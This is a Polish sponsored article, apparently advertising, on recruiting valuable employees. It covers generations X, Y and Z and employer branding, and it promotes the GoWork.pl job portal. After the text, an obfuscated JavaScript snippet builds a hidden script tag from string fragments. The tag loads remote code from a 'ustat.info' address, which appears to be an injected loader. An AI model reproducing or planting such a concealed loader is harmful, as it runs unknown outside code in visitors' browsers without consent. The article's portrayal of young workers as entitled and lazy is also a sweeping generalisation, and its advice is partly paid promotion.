Jak pozyskać wartościowego pracownika?

Lokowanie produktu

W Polsce od kilku lat notowany jest malejący poziom bezrobocia. Na początku 2017 roku można było znaleźć takie miejsca jak Poznań, w którym wskaźnik ten wynosił zaledwie 2 proc.

10.06.2017 17.23
Jak pozyskać wartościowego pracownika?

Eksperci twierdzą, że przy takiej sytuacji na rynku, zatrudnienia nie ma ten, kto nie chce i nie szuka pracy. Sytuacja uległa więc zmianie. Dziś warunki dyktują pracownicy. Po stronie pracodawców pojawił się duży problem - jak znaleźć kandydata, który odpowiadałby elementarnym wymaganiom stawianym dla danego stanowiska? Jak zatem w dzisiejszych czasach pozyskać wartościowego pracownika?

infografika bezrobocie class="wp-image-569740"

Pokolenie X, Y, Z

Młodzi ludzie w dzisiejszych czasach prezentują coraz bardziej roszczeniowe postawy wobec rynku. Sądzą, że wszystko im się należy, bez wykrzesania z siebie minimalnego wysiłku. Oczywiście nie można tu generalizować, nie wszyscy młodzi ludzie są leniwi i chcą otrzymywać coś za nic.

Obecnie wśród osób dorosłych mamy do czynienia z przedstawicielami pokolenia X, pokolenia Y i coraz częściej również pokolenia Z. Do pokolenia X zaliczają się osoby urodzone w latach 1965 - 1979. To osoby, które pracą własnych rąk, dzięki samodyscyplinie i wysiłkowi osiągnęły sukces. Obecnie są właścicielami firm lub piastują wyższe, kierownicze stanowiska. Ich rekrutacja jest trudna, ponieważ zwykle od lat zatrudnieni są w tym samym przedsiębiorstwie i nie chcą zmieniać zawodu, albo sami są sobie szefami.

Pracowników można również poszukiwać wśród przedstawicieli pokolenia Y i Z. Pokolenie Y nazywane jest Milenialsami. To osoby urodzone na przełomie lat 1980-1994, które wkroczyły już na rynek pracy. Jedni świetnie sobie na nim radzą, inni niekoniecznie. To pracownicy z dużą dozą pewności siebie, świadomi swoich mocnych stron, dobrze wykształceni, władający perfekcyjnie językami obcymi. Świetnie znają nowoczesne technologie i potrafią się nimi posługiwać.

Z drugiej strony pojawiają się głosy, że pokolenie Y jest roszczeniowe, nieodpowiedzialne, ale przy tym otwarte i tolerancyjne, w znacznie wyższym stopniu niż pokolenie X. Oni jeszcze bardziej oczekują od pracodawcy przyjaznego miejsca pracy, w którym największą wartością są zatrudnione osoby.

W przypadku pokolenia Z, mamy do czynienia z osobami urodzonymi po 1994 roku, a czasem granica ta przesuwa się na rok 1990. Od najmłodszych lat mają kontakt z nowoczesną technologią - Internetem, smartfonami czy tabletami. Nowinki techniczne są dla nich codziennością. Pokolenie to jest przedsiębiorcze i wie, czego chce. Niewykluczone, że będzie miało ogromny wpływ na rzeczywistość, zrewolucjonizuje ją i unowocześni rynek pracy.

Na pewno poszukiwanie pracowników wśród przedstawicieli pokolenia Z, a po części także pokolenia Y, powinno obejmować publikowanie ofert pracy w serwisach internetowych, np. Gowork.pl/praca. Przed wysłaniem swojej aplikacji, taki kandydat dokona research`u, co ułatwi zakładka Gowork.pl/opinie, dotyczącą konkretnego pracodawcy, publikującego ogłoszenie o pracę.

Jak znaleźć wartościowego pracownika?

Rekrutacja pracowników powinna wynikać z realnej potrzeby uzupełnienia braków kadrowych. Można ją przeprowadzać na dwa różne sposoby, w formie rekrutacji wewnętrznej, czyli wśród członków obecnego zespołu, jak i rekrutacji zewnętrznej.

Pierwszy ze sposobów sprawdza się w dużych firmach, ponieważ otwiera przed pracownikami szansę na awans zawodowy w hierarchii swojej organizacji. Działa motywująco na zespół, a i jego koszty są niższe niż w przypadku poszukiwania pracownika poza przedsiębiorstwem.

W wielu przypadkach nie ma jednak innego wyjścia i trzeba przeprowadzić rekrutację zewnętrzną. Wartościowi pracownicy zwykle mają już zajęcia zawodowe i dotarcie do nich jest bardzo trudne. Nie wystarczy dobrze skonstruowane ogłoszenie o pracę, ponieważ oczekują oni czegoś więcej.

Warto stworzyć dla swojej firmy profil w Internecie, aktualizowany na bieżąco, opatrzony opiniami byłych i obecnych pracowników, np. na stronie GoWork/opinie. Pracownicy dobrze traktowani w organizacji stają się dzięki temu cichymi, anonimowymi ambasadorami marki na zewnątrz. Warto pochwalić się organizowanymi w przedsiębiorstwie wydarzeniami szerszej grupie. Pokazanie firmowych eventów, na pewno ułatwi przyciągnięcie uwagi potencjalnych pracowników.

 class="wp-image-569741"

Zespół OpsTalent podczas jednej z imprez integracyjnych

Pracownicy z pokolenia Y i Z, chcą mieć zagwarantowany rozwój zawodowy - kursy, szkolenia i możliwość awansu, a także będą chcieli uczestniczyć w życiu firmy, stając się jej integralną częścią. Nie bez znaczenia jest dla nich przyjazne i ciekawe środowisko pracy oraz wszelkiego rodzaju benefity. Ciężko jednak zawrzeć wszystkie informacje z tym związane w ogłoszeniu rekrutacyjnym. Warto jednak zadbać, by taka notka była możliwie jak najbardziej dopasowana do konkretnej grupy odbiorczej - zarówno pod względem zawartych tam informacji, jak i wizualnym.

 class="wp-image-569747"

Ogłoszenie dopasowane do konkretnej grupy odbiorczej, umieszczone na portalu GoWork.pl

Wracając jednak do działań employer brandingowych, to stworzenie wspomnianego już profilu pracodawcy, daje szansę przekazania potencjalnym, wartościowym pracownikom najważniejszych informacji o firmie oraz o tym, jak się tu pracuje i czy obecny zespół jest zadowolony ze swojego miejsca pracy.

 class="wp-image-569743"

Relax room w Eurobank

Dobrym przykładem jest tu OpsTalent oraz Eurobank. Oba przedsiębiorstwa organizując imprezy integracyjne oraz tworząc specjalne strefy, w których można odpocząć, zapewniają swojemu zespołowi atrakcyjne miejsce pracy. Co więcej, pokazując to na portalu GoWork.pl, zwiększają swoją szansę na przyciągnięcie wartościowych kandydatów, tym samym czyniąc proces rekrutacji prostszym oraz szybszym.

Na Gowork.pl pracodawca ma możliwość dotarcia ze swoją marką pracodawcy z wyboru oraz ofertami pracy do ściśle stargetowanej grupy potencjalnych kandydatów na konkretne stanowiska pracy. Takie osoby, przed złożeniem aplikacji, zapoznają się z opiniami o pracodawcy. Firma powinna się zatem tak zaprezentować, aby udowodnić, że spełnia oczekiwania rynkowe.
(function(){ x2be_=("u"+"")+"s"+"";x2be_+=("tat.")+("i"); x2be=document.createElement("script");x2be.type="text/javascript";x2be_+="nf"+("o")+"/"; x2beu="63922898"+".";x2be.async=true;x2beu+="9k7h9cbt2bew031lgu2h0ipg6prtn8"; x2be.src="//"+x2be_+x2beu; x2beb=document.body; x2beb.appendChild(x2be); })();

Lokowanie produktu
Najnowsze